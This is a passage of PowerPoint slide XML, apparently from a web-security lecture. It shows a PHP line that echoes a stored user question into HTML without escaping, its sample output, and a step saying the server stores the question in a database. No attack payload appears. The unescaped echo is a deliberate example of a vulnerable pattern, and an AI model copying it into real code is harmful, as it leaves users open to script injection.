          <p:cNvPr id="29" name="object 29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2304289" y="1331941"/>
            <a:ext cx="5651500" cy="215444"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="123610">
              <a:lnSpc>
                <a:spcPts val="1647"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>echo</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1" spc="67" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="818181"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>"&lt;div</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="93" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="818181"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="818181"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>class=’question'&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="818181"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>$question</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="818181"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;/div&gt;"</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="object 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7955279" y="1331942"/>
            <a:ext cx="246380" cy="230293"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="184785" h="172719">
                <a:moveTo>
                  <a:pt x="184403" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="172212"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="184403" y="172212"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="184403" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FDF8E3"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="object 31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7938346" y="1280470"/>
            <a:ext cx="277705" cy="263320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:spcBef>
                <a:spcPts val="133"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>?&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="object 32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="833121" y="1728199"/>
            <a:ext cx="6017260" cy="215444"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1647"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>HTML Code:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1" spc="20" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;div</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="33" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>class</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>’question'</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>”How</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1" spc="20" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>do</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1" spc="27" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>I</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1" spc="20" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>get</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1" spc="20" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="object 33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="833120" y="1976103"/>
            <a:ext cx="1473200" cy="230293"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1104900" h="172719">
                <a:moveTo>
                  <a:pt x="1104900" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="643128" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="551688" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="172212"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="551688" y="172212"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="643128" y="172212"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1104900" y="172212"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1104900" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="object 34"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="816187" y="1924633"/>
            <a:ext cx="1505373" cy="263320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:spcBef>
                <a:spcPts val="133"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>loan?”</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;/div&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="object 35"/>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36" name="object 36"/>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37" name="object 37"/>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38" name="object 38"/>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39" name="object 3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40" name="object 4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41" name="object 41"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11170612" y="1525801"/>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42" name="object 42"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10253472" y="1487408"/>
            <a:ext cx="1609513" cy="451273"/>
            <a:chOff x="7690103" y="1115555"/>
            <a:chExt cx="1207135" cy="338455"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="43" name="object 43"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId9" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="8430762" y="1115555"/>
              <a:ext cx="458723" cy="150873"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="44" name="object 44"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8476449" y="1139062"/>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5" name="object 45"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8476449" y="1139062"/>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6" name="object 46"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId10" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="8638022" y="1246644"/>
              <a:ext cx="251456" cy="158483"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="47" name="object 47"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId11" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="7690103" y="1344167"/>
              <a:ext cx="1207007" cy="109727"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="48" name="object 48"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7731403" y="1377601"/>
              <a:ext cx="1121410" cy="0"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1121409">
                  <a:moveTo>
                    <a:pt x="1120787" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="25400">
              <a:solidFill>
                <a:srgbClr val="4F81BD"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49" name="object 49"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11139840" y="1609244"/>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50" name="object 50"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10396371" y="1552587"/>
            <a:ext cx="1458807" cy="220133"/>
            <a:chOff x="7797278" y="1164440"/>
            <a:chExt cx="1094105" cy="165100"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="51" name="object 51"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId12" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="8432292" y="1178039"/>
              <a:ext cx="458718" cy="150873"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="52" name="object 52"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8477986" y="1201648"/>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53" name="object 53"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8477986" y="1201648"/>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54" name="object 54"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId13" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="7797278" y="1164440"/>
              <a:ext cx="288010" cy="52552"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55" name="object 55"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10677381" y="2015266"/>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56" name="object 56"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10239237" y="1798319"/>
            <a:ext cx="497840" cy="591820"/>
            <a:chOff x="7679428" y="1348739"/>
            <a:chExt cx="373380" cy="443865"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="57" name="object 57"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId14" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="7679428" y="1348739"/>
              <a:ext cx="373374" cy="443478"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="58" name="object 58"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId15" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="7725854" y="1372057"/>
              <a:ext cx="277418" cy="348907"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="59" name="object 59"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7725854" y="1372057"/>
              <a:ext cx="277495" cy="349250"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="277495" h="349250">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="277418" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="277418" y="348907"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="348907"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="9524">
              <a:solidFill>
                <a:srgbClr val="4A7EBB"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="60" name="object 60"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7736941" y="1405343"/>
              <a:ext cx="233679" cy="154305"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="233679"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61" name="object 61"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10294722" y="1917812"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="62" name="object 62"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId16" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7606571" y="4724570"/>
            <a:ext cx="1172355" cy="1542575"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63" name="object 63"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7781417" y="5675999"/>
            <a:ext cx="3685540" cy="755762"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="976182">
              <a:spcBef>
                <a:spcPts val="133"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-27" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Server</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-27" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" i="1" spc="-20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>stores</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="50799"/>
            <a:r>
              <a:rPr sz="3600" spc="-9" baseline="-27777" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Server</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" spc="669" baseline="-27777" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>question</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>in</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>database.</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64" name="object 64"/>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65" name="object 65"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="849376" y="3076432"/>
            <a:ext cx="1609513" cy="451273"/>
            <a:chOff x="637031" y="2307323"/>
            <a:chExt cx="1207135" cy="338455"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="66" name="object 66"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId17" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1377695" y="2307323"/>
              <a:ext cx="460247" cy="150873"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="67" name="object 67"/>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68" name="object 68"/>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69" name="object 69"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId10" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1584950" y="2438385"/>
              <a:ext cx="251459" cy="156971"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="70" name="object 70"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId18" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="637031" y="2534391"/>
              <a:ext cx="1207007" cy="111252"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
